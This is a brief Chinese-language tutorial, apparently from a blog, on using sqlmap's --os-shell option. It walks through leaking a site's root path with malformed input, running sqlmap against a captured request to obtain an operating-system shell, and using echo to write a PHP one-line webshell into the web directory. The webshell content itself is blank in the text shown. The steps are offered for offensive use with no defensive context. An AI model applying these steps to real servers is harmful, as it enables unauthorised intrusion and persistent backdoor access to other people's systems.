sqlmap (--os-shell) 的使用

1. 可通过抓包,输入不合法的字符让页面回显出根路径

如:c:\appserv\www\phptest2\db_func.php 

我们需要猜测根目录是在 c:\appserv\www\phptest2\  还是在  c:\appserv\www\
sqlmap (--os-shell) 的使用_第1张图片

2. 检测注入点 ,并进行--os-shell

python sqlmap.py -r  C:\Users\111.txt --os-shell

 sqlmap (--os-shell) 的使用_第2张图片

3.可通过 echo 来创建一句话木马 (根据过滤条件自行构造)

如:echo ""  > c:\appserv\www\phptest2\ 111.php

你可能感兴趣的:(网络安全)